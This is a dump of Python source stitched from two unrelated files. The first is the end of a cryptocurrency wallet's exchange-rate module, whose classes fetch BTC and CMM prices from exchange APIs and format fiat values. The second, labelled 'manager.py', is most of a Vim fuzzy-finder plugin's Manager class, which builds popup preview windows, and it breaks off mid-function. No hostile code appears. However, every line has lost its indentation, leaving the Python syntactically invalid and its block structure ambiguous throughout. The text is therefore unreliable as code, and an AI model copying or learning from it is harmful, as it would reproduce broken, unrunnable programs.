def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['NEG']['last'])}
def history_ccys(self):
return ['BRL']
class Unocoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.unocoin.com', 'trade?buy')
return {'INR': Decimal(json)}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/btc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/btc_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/btc_usd')
return {'EUR': Decimal(json_eur['btc_eur']['last']),
'RUB': Decimal(json_rub['btc_rur']['last']),
'USD': Decimal(json_usd['btc_usd']['last'])}
class Winkdex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('winkdex.com', '/api/v0/price')
return {'USD': Decimal(json['price'] / 100.0)}
def history_ccys(self):
return ['USD']
def request_history(self, ccy):
json = self.get_json('winkdex.com',
"/api/v0/series?start_time=1342915200")
history = json['series'][0]['results']
return dict([(h['timestamp'][:10], h['price'] / 100.0)
for h in history])
class Zaif(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.zaif.jp', '/api/1/last_price/btc_jpy')
return {'JPY': Decimal(json['last_price'])}
# fetch cmm/usd exchange rate
class CryptoBridge(ExchangeBase):
def get_rates(self, ccy):
cmm_btc = 0
pair_with_btc_json = self.get_json('api.crypto-bridge.org', '/api/v1/ticker')
for ticker in pair_with_btc_json:
if ticker['id'] == 'CMM_BTC':
cmm_btc = Decimal(ticker['last'])
break
btc_to_fiat_json = self.get_json('api.coinbase.com',
'/v2/exchange-rates?currency=BTC')
result = dict([(ccy, Decimal(rate) * cmm_btc)
for (ccy, rate) in btc_to_fiat_json["data"]["rates"].items()])
return result
def history_ccys(self):
return ['USD']
def historical_rates(self, ccy):
json = self.get_json('coincodex.com', 'api/coincodex/get_coin_history/CMM/2019-04-01/2019-05-01/600')
history = json['CMM'][0]
return dict([(datetime.utcfromtimestamp(h[0]).strftime('%Y-%m-%d'), h[1])
for h in history])
class Crex24(ExchangeBase):
def get_rates(self, ccy):
pair_with_btc_json = self.get_json('api.crex24.com',
'/CryptoExchangeService/BotPublic/ReturnTicker?request=[NamePairs=BTC_CMM]')
cmm_btc = Decimal(pair_with_btc_json['Tickers'][0]['Last'])
btc_to_fiat_json = self.get_json('api.coinbase.com',
'/v2/exchange-rates?currency=BTC')
result = dict([(ccy, Decimal(rate) * cmm_btc)
for (ccy, rate) in btc_to_fiat_json["data"]["rates"].items()])
return result
def history_ccys(self):
return ['USD']
def historical_rates(self, ccy):
json = self.get_json('coincodex.com', 'api/coincodex/get_coin_history/CMM/2019-04-01/2019-05-01/600')
history = json['CMM'][0]
return dict([(datetime.utcfromtimestamp(h[0]).strftime('%Y-%m-%d'), h[1])
for h in history])
class Coinodex(ExchangeBase):
def history_ccys(self):
return ['USD']
def historical_rates(self, ccy):
json = self.get_json('coincodex.com', 'api/coincodex/get_coin_history/CMM/2019-04-01/2019-05-01/600')
history = json['CMM'][0]
return dict([(datetime.utcfromtimestamp(h[0]).strftime('%Y-%m-%d'), h[1])
for h in history])
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from electrum.util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import vim
import os
import sys
import json
import time
import operator
import itertools
import threading
import multiprocessing
from functools import partial
from functools import wraps
from .instance import LfInstance
from .cli import LfCli
from .utils import *
from .fuzzyMatch import FuzzyMatch
from .asyncExecutor import AsyncExecutor
from .devicons import (
webDevIconsGetFileTypeSymbol,
removeDevIcons
)
is_fuzzyEngine_C = False
try:
import fuzzyEngine
is_fuzzyEngine_C = True
cpu_count = multiprocessing.cpu_count()
lfCmd("let g:Lf_fuzzyEngine_C = 1")
except ImportError:
lfCmd("let g:Lf_fuzzyEngine_C = 0")
is_fuzzyMatch_C = False
try:
import fuzzyMatchC
is_fuzzyMatch_C = True
lfCmd("let g:Lf_fuzzyMatch_C = 1")
except ImportError:
lfCmd("let g:Lf_fuzzyMatch_C = 0")
if sys.version_info >= (3, 0):
def isAscii(str):
try:
str.encode("ascii")
return True
except UnicodeEncodeError:
return False
else:
def isAscii(str):
try:
str.decode("ascii")
return True
except UnicodeDecodeError:
return False
def modifiableController(func):
@wraps(func)
def deco(self, *args, **kwargs):
self._getInstance().buffer.options['modifiable'] = True
func(self, *args, **kwargs)
self._getInstance().buffer.options['modifiable'] = False
return deco
def catchException(func):
@wraps(func)
def deco(self, *args, **kwargs):
try:
func(self, *args, **kwargs)
except vim.error as e: # for neovim
if str(e) != "b'Keyboard interrupt'" and str(e) != 'Keyboard interrupt':
raise e
elif self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
except KeyboardInterrupt: # <C-C>, this does not work in vim
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
return deco
def ignoreEvent(events):
def wrapper(func):
@wraps(func)
def deco(self, *args, **kwargs):
try:
saved_eventignore = vim.options['eventignore']
vim.options['eventignore'] = events
func(self, *args, **kwargs)
finally:
vim.options['eventignore'] = saved_eventignore
return deco
return wrapper
#*****************************************************
# Manager
#*****************************************************
class Manager(object):
def __init__(self):
self._autochdir = 0
self._instance = None
self._cli = LfCli()
self._explorer = None
self._content = []
self._index = 0
self._help_length = 0
self._show_help = False
self._selections = {}
self._highlight_pos = []
self._highlight_pos_list = []
self._highlight_refine_pos = []
self._highlight_ids = []
self._orig_line = ''
self._ctrlp_pressed = False
self._fuzzy_engine = None
self._result_content = []
self._reader_thread = None
self._timer_id = None
self._highlight_method = lambda : None
self._orig_cwd = None
self._cursorline_dict = {}
self._empty_query = lfEval("get(g:, 'Lf_EmptyQuery', 1)") == '1'
self._preview_winid = 0
self._is_previewed = False
self._match_ids = []
self._vim_file_autoloaded = False
self._arguments = {}
self._getExplClass()
#**************************************************************
# abstract methods, in fact all the functions can be overridden
#**************************************************************
def _getExplClass(self):
"""
this function MUST be overridden
return the name of Explorer class
"""
raise NotImplementedError("Can't instantiate abstract class Manager "
"with abstract methods _getExplClass")
def _defineMaps(self):
pass
def _defineCommonMaps(self):
normal_map = lfEval("get(g:, 'Lf_NormalMap', {})")
if "_" not in normal_map:
return
for [lhs, rhs] in normal_map["_"]:
# If a buffer-local mapping does not exist, map it
maparg = lfEval("maparg('{}', 'n', 0, 1)".format(lhs))
if maparg == {} or maparg.get("buffer", "0") == "0" :
lfCmd("nnoremap <buffer> <silent> {} {}".format(lhs, rhs))
def _cmdExtension(self, cmd):
"""
this function can be overridden to add new cmd
if return true, exit the input loop
"""
pass
@removeDevIcons
def _argaddFiles(self, files):
# It will raise E480 without 'silent!'
lfCmd("silent! argdelete *")
for file in files:
lfCmd("argadd %s" % escSpecial(file))
def _issue_422_set_option(self):
if lfEval("has('nvim')") == '1' and self._is_previewed:
lfCmd("silent! setlocal number<")
lfCmd("silent! setlocal relativenumber<")
lfCmd("silent! setlocal cursorline<")
lfCmd("silent! setlocal colorcolumn<")
lfCmd("silent! setlocal winhighlight<")
def _acceptSelection(self, *args, **kwargs):
pass
def _getDigest(self, line, mode):
"""
this function can be overridden
specify what part in the line to be processed and highlighted
Args:
mode: 0, return the full path
1, return the name only
2, return the directory name
"""
if mode == 0:
return line
elif mode == 1:
return getBasename(line)
else:
return getDirname(line)
def _getDigestStartPos(self, line, mode):
"""
this function can be overridden
return the start position of the digest returned by _getDigest()
Args:
mode: 0, return the start postion of full path
1, return the start postion of name only
2, return the start postion of directory name
"""
if mode == 0 or mode == 2:
return 0
else:
return lfBytesLen(getDirname(line))
def _createHelp(self):
return []
def _setStlMode(self, **kwargs):
if self._cli.isFuzzy:
if self._getExplorer().supportsNameOnly():
if self._cli.isFullPath:
mode = 'FullPath'
else:
mode = 'NameOnly'
else:
mode = 'Fuzzy'
else:
mode = 'Regex'
modes = {"--nameOnly", "--fullPath", "--fuzzy", "--regexMode"}
for opt in kwargs.get("arguments", {}):
if opt in modes:
if opt == "--regexMode":
mode = 'Regex'
elif self._getExplorer().supportsNameOnly():
if opt == "--nameOnly":
mode = 'NameOnly'
elif opt == "--fullPath":
mode = 'FullPath'
else: # "--fuzzy"
if self._cli.isFullPath:
mode = 'FullPath'
else:
mode = 'NameOnly'
elif opt in ("--nameOnly", "--fullPath", "--fuzzy"):
mode = 'Fuzzy'
break
self._getInstance().setStlMode(mode)
self._cli.setCurrentMode(mode)
def _beforeEnter(self):
self._resetAutochdir()
self._cur_buffer = vim.current.buffer
def _afterEnter(self):
if self._vim_file_autoloaded == False:
category = self._getExplorer().getStlCategory()
if category == 'Colorscheme':
category = 'Colors'
lfCmd("silent! call leaderf#%s#a_nonexistent_function()" % category)
self._vim_file_autoloaded = True
if "--nowrap" in self._arguments:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal nowrap')" % self._getInstance().getPopupWinId())
elif self._getInstance().getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'wrap', v:false)" % self._getInstance().getPopupWinId())
else:
self._getInstance().window.options['wrap'] = False
else:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal wrap')" % self._getInstance().getPopupWinId())
elif self._getInstance().getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'wrap', v:true)" % self._getInstance().getPopupWinId())
else:
self._getInstance().window.options['wrap'] = True
if self._getInstance().getWinPos() != 'popup':
self._defineMaps()
self._defineCommonMaps()
id = int(lfEval("matchadd('Lf_hl_cursorline', '.*\%#.*', 9)"))
self._match_ids.append(id)
else:
lfCmd("""call win_execute({}, 'let matchid = matchadd(''Lf_hl_cursorline'', ''.*\%#.*'', 9)')"""
.format(self._getInstance().getPopupWinId()))
id = int(lfEval("matchid"))
self._match_ids.append(id)
if is_fuzzyEngine_C:
self._fuzzy_engine = fuzzyEngine.createFuzzyEngine(cpu_count, False)
def _beforeExit(self):
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
self.clearSelections()
self._getExplorer().cleanup()
if self._fuzzy_engine:
fuzzyEngine.closeFuzzyEngine(self._fuzzy_engine)
self._fuzzy_engine = None
if self._reader_thread and self._reader_thread.is_alive():
self._stop_reader_thread = True
self._closePreviewPopup()
if self._getInstance().getWinPos() == 'popup':
for i in self._match_ids:
lfCmd("silent! call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
for i in self._match_ids:
lfCmd("silent! call matchdelete(%d)" % i)
self._match_ids = []
def _afterExit(self):
pass
def _bangEnter(self):
self._preview_open = False
self._current_mode = 'NORMAL'
if self._getInstance().getWinPos() == 'popup':
self._cli.hideCursor()
if lfEval("exists('*leaderf#%s#NormalModeFilter')" % self._getExplorer().getStlCategory()) == '1':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')" % (self._getInstance().getPopupWinId(),
'leaderf#%s#NormalModeFilter' % self._getExplorer().getStlCategory()))
else:
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#NormalModeFilter', [%d]))"
% (self._getInstance().getPopupWinId(), id(self)))
self._resetHighlights()
if self._cli.pattern and self._index == 0:
self._search(self._content)
if len(self._getInstance().buffer) < len(self._result_content):
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
def _bangReadFinished(self):
if self._preview_open == False and self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._previewResult(False)
self._preview_open = True
def _getList(self, pairs):
"""
this function can be overridden
return a list constructed from pairs
Args:
pairs: a list of tuple(weight, line, ...)
"""
return [p[1] for p in pairs]
def _getUnit(self):
"""
indicates how many lines are considered as a unit
"""
return 1
def _supportsRefine(self):
return False
def _previewInPopup(self, *args, **kwargs):
pass
def _closePreviewPopup(self):
if lfEval("has('nvim')") == '1':
if self._preview_winid:
if int(lfEval("nvim_win_is_valid(%d) == v:true" % self._preview_winid)):
lfCmd("noautocmd call nvim_win_close(%d, 1)" % self._preview_winid)
self._preview_winid = 0
else:
if self._preview_winid:
lfCmd("noautocmd call popup_close(%d)" % self._preview_winid)
self._preview_winid = 0
def _previewResult(self, preview):
if self._getInstance().getWinPos() == 'floatwin':
self._cli.buildPopupPrompt()
if lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1':
if self._orig_line != self._getInstance().currentLine:
self._closePreviewPopup()
else:
return
if not self._needPreview(preview):
return
line = self._getInstance().currentLine
if lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1':
line_nr = self._getInstance().window.cursor[0]
self._previewInPopup(line, self._getInstance().buffer, line_nr)
return
orig_pos = self._getInstance().getOriginalPos()
cur_pos = (vim.current.tabpage, vim.current.window, vim.current.buffer)
saved_eventignore = vim.options['eventignore']
vim.options['eventignore'] = 'BufLeave,WinEnter,BufEnter'
try:
vim.current.tabpage, vim.current.window = orig_pos[:2]
line_nr = self._getInstance().window.cursor[0]
self._acceptSelection(line, self._getInstance().buffer, line_nr, preview=True)
lfCmd("augroup Lf_Cursorline")
lfCmd("autocmd! BufwinEnter <buffer> setlocal cursorline<")
lfCmd("augroup END")
finally:
if self._getInstance().getWinPos() != 'popup':
vim.current.tabpage, vim.current.window, vim.current.buffer = cur_pos
vim.options['eventignore'] = saved_eventignore
def _restoreOrigCwd(self):
if self._orig_cwd is None:
return
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
try:
if int(lfEval("&autochdir")) == 0 and lfGetCwd() != self._orig_cwd:
chdir(self._orig_cwd)
except:
if lfGetCwd() != self._orig_cwd:
chdir(self._orig_cwd)
def _needExit(self, line, arguments):
return True
def setArguments(self, arguments):
self._arguments = arguments
def getArguments(self):
return self._arguments
#**************************************************************
@ignoreEvent('BufWinEnter,BufEnter')
def _createPopupModePreview(self, title, source, line_nr, jump_cmd):
"""
Args:
source:
if the type is int, it is a buffer number
if the type is str, it is a file name
"""
self._is_previewed = True
if lfEval("has('nvim')") == '1':
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2
else:
maxwidth = min(width, int(lfEval("&columns")))
relative = 'editor'
if isinstance(source, int):
buffer_len = len(vim.buffers[source])
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
buffer_len = int(lfEval("len(content)"))
lfCmd("let scratch_buffer = nvim_create_buf(0, 1)")
lfCmd("call setbufline(scratch_buffer, 1, content)")
lfCmd("call nvim_buf_set_option(scratch_buffer, 'bufhidden', 'wipe')")
float_window = self._getInstance().window
float_win_row = int(float(lfEval("nvim_win_get_config(%d).row" % float_window.id)))
float_win_col = int(float(lfEval("nvim_win_get_config(%d).col" % float_window.id)))
preview_pos = lfEval("get(g:, 'Lf_PopupPreviewPosition', 'top')")
if preview_pos.lower() == 'bottom':
anchor = "NW"
if self._getInstance().getPopupInstance().statusline_win:
statusline_height = 1
else:
statusline_height = 0
row = float_win_row + float_window.height + statusline_height
col = float_win_col
height = int(lfEval("&lines")) - row - 2
if height < 1:
return
width = float_window.width
elif preview_pos.lower() == 'top':
anchor = "SW"
row = float_win_row - 1
col = float_win_col
height = row
if height < 1:
return
width = float_window.width
else:
anchor = "SW"
start = int(lfEval("line('w0')")) - 1
end = int(lfEval("line('.')")) - 1
col_width = float_window.width - int(lfEval("&numberwidth")) - 1
delta_height = lfActualLineCount(self._getInstance().buffer, start, end, col_width)
row = float_win_row + delta_height
col = float_win_col + int(lfEval("&numberwidth")) + 1 + float_window.cursor[1]
height = row
width = maxwidth
config = {
"relative": relative,
"anchor" : anchor,
"height" : height,
"width" : width,
"row" : row,
"col" : col
}
if isinstance(source, int):
self._preview_winid = int(lfEval("nvim_open_win(%d, 0, %s)" % (source, str(config))))
else:
self._preview_winid = int(lfEval("nvim_open_win(scratch_buffer, 0, %s)" % str(config)))
lfCmd("let g:Lf_PreviewWindowID[%d] = %d" % (id(self), self._preview_winid))
if jump_cmd:
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd(jump_cmd)
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
if buffer_len >= line_nr > 0:
lfCmd("""call nvim_win_set_cursor(%d, [%d, 1])""" % (self._preview_winid, line_nr))
lfCmd("call nvim_win_set_option(%d, 'number', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'relativenumber', v:false)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'foldmethod', 'manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call nvim_win_set_option(%d, 'cursorlineopt', 'both')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'colorcolumn', '')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'winhighlight', 'Normal:Lf_hl_popup_window')" % self._preview_winid)
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
if not isinstance(source, int):
lfCmd("doautocmd filetypedetect BufNewFile %s" % source)
lfCmd("silent! %foldopen!")
lfCmd("norm! zz")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
# lfCmd("redraw!") # maybe we don't need it, it makes the preview slow
else:
popup_window = self._getInstance().window
popup_pos = lfEval("popup_getpos(%d)" % popup_window.id)
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2 - 1
else:
maxwidth = min(width, int(lfEval("&columns")))
if isinstance(source, int):
buffer_len = len(vim.buffers[source])
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
buffer_len = int(lfEval("len(content)"))
preview_pos = lfEval("get(g:, 'Lf_PopupPreviewPosition', 'top')")
if preview_pos.lower() == 'bottom':
maxwidth = int(popup_pos["width"])
col = int(popup_pos["col"])
if self._getInstance().getPopupInstance().statusline_win:
statusline_height = 1
else:
statusline_height = 0
line = int(popup_pos["line"]) + int(popup_pos["height"]) + statusline_height
pos = "topleft"
maxheight = int(lfEval("&lines")) - line
if maxheight < 1:
return
if buffer_len >= maxheight: # scrollbar appear
maxwidth -= 1
elif preview_pos.lower() == 'top':
maxwidth = int(popup_pos["width"])
col = int(popup_pos["col"])
# int(popup_pos["line"]) - 1(exclude the first line) - 1(input window) - 1(title)
maxheight = int(popup_pos["line"]) - 3
if maxheight < 1:
return
if buffer_len >= maxheight: # scrollbar appear
maxwidth -= 2
pos = "botleft"
line = maxheight + 1
else: # cursor
lfCmd("""call win_execute(%d, "let numberwidth = &numberwidth")""" % popup_window.id)
col = int(popup_pos["core_col"]) + int(lfEval("numberwidth")) + popup_window.cursor[1]
lfCmd("""call win_execute(%d, "let delta_height = line('.') - line('w0')")""" % popup_window.id)
# the line of buffer starts from 0, while the line of line() starts from 1
start = int(lfEval("line('w0', %d)" % popup_window.id)) - 1
end = int(lfEval("line('.', %d)" % popup_window.id)) - 1
col_width = int(popup_pos["core_width"]) - int(lfEval("numberwidth"))
delta_height = lfActualLineCount(self._getInstance().buffer, start, end, col_width)
# int(popup_pos["core_line"]) - 1(exclude the first line) - 1(input window)
maxheight = int(popup_pos["core_line"]) + delta_height - 2
pos = "botleft"
line = maxheight + 1
options = {
"title": title,
"maxwidth": maxwidth,
"minwidth": maxwidth,
"maxheight": maxheight,
"minheight": maxheight,
"zindex": 20481,
"pos": pos,
"line": line,
"col": col,
"border": [1, 0, 0, 1],
"borderhighlight": ["Lf_hl_previewTitle"],
"filter": "leaderf#popupModePreviewFilter",
}
if preview_pos.lower() == 'bottom':
del options["title"]
options["border"] = [0, 0, 1, 0]
elif preview_pos.lower() == 'cursor' and maxheight < int(lfEval("&lines"))//2 - 2:
maxheight = int(lfEval("&lines")) - maxheight - 5
del options["title"]
options["border"] = [0, 0, 1, 0]
options["maxheight"] = maxheight
options["minheight"] = maxheight
if isinstance(source, int):
lfCmd("noautocmd silent! let winid = popup_create(%d, %s)" % (source, json.dumps(options)))
else:
lfCmd("silent! let winid = popup_create(content, %s)" % json.dumps(options))
lfCmd("call win_execute(winid, 'doautocmd filetypedetect BufNewFile %s')" % escQuote(source))
self._preview_winid = int(lfEval("winid"))
if jump_cmd:
lfCmd("""call win_execute(%d, '%s')""" % (self._preview_winid, escQuote(jump_cmd)))
elif line_nr > 0:
lfCmd("""call win_execute(%d, "call cursor(%d, 1)")""" % (self._preview_winid, line_nr))
lfCmd("call win_execute(%d, 'setlocal cursorline number norelativenumber colorcolumn= ')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal foldmethod=manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call win_execute(%d, 'setlocal cursorlineopt=both')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal wincolor=Lf_hl_popup_window')" % self._preview_winid)
if lfEval("get(g:, 'Lf_PopupShowFoldcolumn', 1)") == '0':
lfCmd("call win_execute(%d, 'setlocal foldcolumn=0')" % self._preview_winid)
else:
lfCmd("call win_execute(%d, 'setlocal foldcolumn=1')" % self._preview_winid)
lfCmd("call win_execute(%d, 'norm! zz')" % self._preview_winid)
@ignoreEvent('BufRead,BufReadPre,BufReadPost')
def _createPopupPreview(self, title, source, line_nr, jump_cmd=''):
"""
Args:
source:
if the type is int, it is a buffer number
if the type is str, it is a file name
"""
self._is_previewed = True
line_nr = int(line_nr)
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._createPopupModePreview(title, source, line_nr, jump_cmd)
return
if lfEval("has('nvim')") == '1':
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
width = int(lfEval("&columns"))//2
else:
width = min(width, int(lfEval("&columns")))
maxheight = int(lfEval("&lines - (line('w$') - line('.')) - 3"))
maxheight -= int(self._getInstance().window.height) - int(lfEval("(line('w$') - line('w0') + 1)"))
relative = 'editor'
anchor = "SW"
row = maxheight
if isinstance(source, int):
buffer_len = len(vim.buffers[source])
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
buffer_len = int(lfEval("len(content)"))
lfCmd("let scratch_buffer = nvim_create_buf(0, 1)")
lfCmd("call setbufline(scratch_buffer, 1, content)")
lfCmd("call nvim_buf_set_option(scratch_buffer, 'bufhidden', 'wipe')")
height = min(maxheight, buffer_len)
preview_pos = lfEval("get(g:, 'Lf_PreviewHorizontalPosition', 'right')")
if preview_pos.lower() == 'center':
col = (int(lfEval("&columns")) - width) // 2
elif preview_pos.lower() == 'left':
col = 0
elif preview_pos.lower() == 'right':
col = int(lfEval("&columns")) - width
else:
relative = 'cursor'
row = 0
col = 0
if maxheight < int(lfEval("&lines"))//2 - 2:
anchor = "NW"
if relative == 'cursor':
row = 1
else:
row = maxheight + 1
height = min(int(lfEval("&lines")) - maxheight - 3, buffer_len)
config = {
"relative": relative,
"anchor" : anchor,
"height" : height,
"width" : width,
"row" : row,
"col" : col
}
if isinstance(source, int):
self._preview_winid = int(lfEval("nvim_open_win(%d, 0, %s)" % (source, str(config))))
else:
self._preview_winid = int(lfEval("nvim_open_win(scratch_buffer, 0, %s)" % str(config)))
if jump_cmd:
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd(jump_cmd)
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
if buffer_len >= line_nr > 0:
lfCmd("""call nvim_win_set_cursor(%d, [%d, 1])""" % (self._preview_winid, line_nr))
lfCmd("call nvim_win_set_option(%d, 'number', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'relativenumber', v:false)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'foldmethod', 'manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call nvim_win_set_option(%d, 'cursorlineopt', 'both')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'colorcolumn', '')" % self._preview_winid)
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
if not isinstance(source, int):
lfCmd("doautocmd filetypedetect BufNewFile %s" % source)
lfCmd("silent! %foldopen!")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
preview_pos = lfEval("get(g:, 'Lf_PreviewHorizontalPosition', 'right')")
if preview_pos.lower() == 'center':
